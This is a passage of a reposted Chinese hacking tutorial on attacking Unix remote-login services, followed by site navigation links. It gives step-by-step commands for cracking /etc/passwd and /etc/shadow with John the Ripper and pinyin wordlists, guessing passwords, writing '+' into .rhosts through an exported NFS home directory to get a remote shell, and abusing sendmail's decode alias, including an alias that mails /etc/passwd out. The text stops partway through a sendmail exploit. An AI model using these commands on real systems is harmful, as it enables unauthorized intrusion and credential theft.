　1) telnet
要点是取得用户帐号和保密字
1.1) 取得用户帐号
:em04: 1.1.1) 使用“白手起家”中介绍的方法
1.1.2) 其他方法：e.g.根据从那个站点寄出的e-mail地址
1.2) 获取口令
1.2.1) 口令破解
1.2.1.1) 使用“隔空取物”中介绍的方法取得/etc/passwd和/etc/shadow
1.2.1.2) 使用口令破解程序破解口令 :em08:
e.g.使用john the riper：
# unshadow passwd shadow > pswd.1
# pwd_crack -single pswd.1
# pwd_crack -Word文件:/usr/dict/words -rules pswd.1
# pwd_crack -i:alph5 pswd.1

# dicgen 1 words1 /* 所有1音节的汉语拼音 */
# dicgen 2 words2 /* 所有2音节的汉语拼音 */
# dicgen 3 words3 /* 所有3音节的汉语拼音 */
# pwd_crack -word文件:words1 -rules pswd.1
# pwd_crack -word文件:words2 -rules pswd.1
# pwd_crack -word文件:words3 -rules pswd.1
1.2.2) 蛮干(brute force)：猜测口令 :em14:
猜法：与用户名相同的口令，用户名的简单变体，机构名，机器型号etc
e.g. cxl: cxl,cxl111,cxl123,cxl12345,cxlsun,ultra30 etc...

2) r-命令:rlogin,rsh
关键在信任关系，即:/etc/hosts.equiv,~/.rhosts文件
2.1) /etc/hosts.equiv
如果/etc/hosts.equiv文件中有一个"+"，那么任何一台主机上的任何一个用户（root除
外），可以远程登录而不需要口令,并成为该机上同名用户;
2.2) ~/.rhosts
如果某用户主目录(home Directory)下.rhosts文件中有一个"+"，那么任何一台主机上
的同名用户可以远程登录而不需要口令
2.3) 改写这两个文件
2.3.1) nfs
如果某用户的主目录共享出来
# showmount -e numen
eXPort list for numen:
/space/users/lpf sun9
/space/users/zw (everyone)
# mount -F nfs numen:/space/users/zw /mnt
# cd /mnt
# ls -ld .
drwxr-xr-x 6 1005 staff 2560 1999 5月 11 .
# echo zw:x:1005:1:temporary break-in account:/:/bin/sh >> /etc/passwd
# echo zw::::::::: >> /etc/shadow
# su zw
$ cat >.rhosts
+
^D
$ rsh numen csh -i
Warning: no Access to tty; thus no job control in this shell...
numen%
2.3.2) smtp
利用``decode';';别名
a) 若任一用户主目录(e.g./home/zen)或其下.rhosts对daemon可写，则
# echo "+" uuencode /home/zen/.rhosts mail decode@victim.com
(samsa:于是/home/zem/.rhosts中就出现一个"+")
b) 无用户主目录或其下.rhosts对daemon可写，则利用/etc/aliases.pag,
因为许多系统中该文件是world-writable.
# cat decode
bin: " cat /etc/passwd mail me@my.e-mail.addr"
# newaliases -oQ/tmp -oA`pwd`/decode
# uuencode decode.pag /etc/aliases.pag mail decode@victom.com
# /usr/lib/sendmail -fbin -om -oi bin@victim.com < /dev/null
(samsa:wait .....)
c) sendmail 5.59 以前的bug
# cat evil_sendmail
telnet victim.com 25 << EOSM
rcpt to: /home/zen/.rhosts

[1] [2] 下一页

上一篇:黑客攻击与防守

下一篇:超级黑客“Hacker”最喜欢用的攻击方法

[推荐]远程登录攻击相关文章：

·全程攻击无线网络WEP加密（二）

·全程攻击无线网络WEP加密（一）

·各种病毒分析及攻击防御手册

·不怕被攻击 Windows系统防黑技巧七招

·黑客攻击与防守

·Windows系统用户摆脱黑客攻击的方法

[推荐]远程登录攻击相关软件：

·黑客的攻击手段及用户对策＋PDG绿色迷你阅读器

·SQL注入法攻击

特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员，我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源：http://www.viphot.com

	\| 帮助(？) \| 版权声明 \| 友情连接 \| 关于我们 \| 信息发布
Copyright 2007 www.viphot.com All Rights Reserved.	鄂ICP备05000083号Powered by:vipcn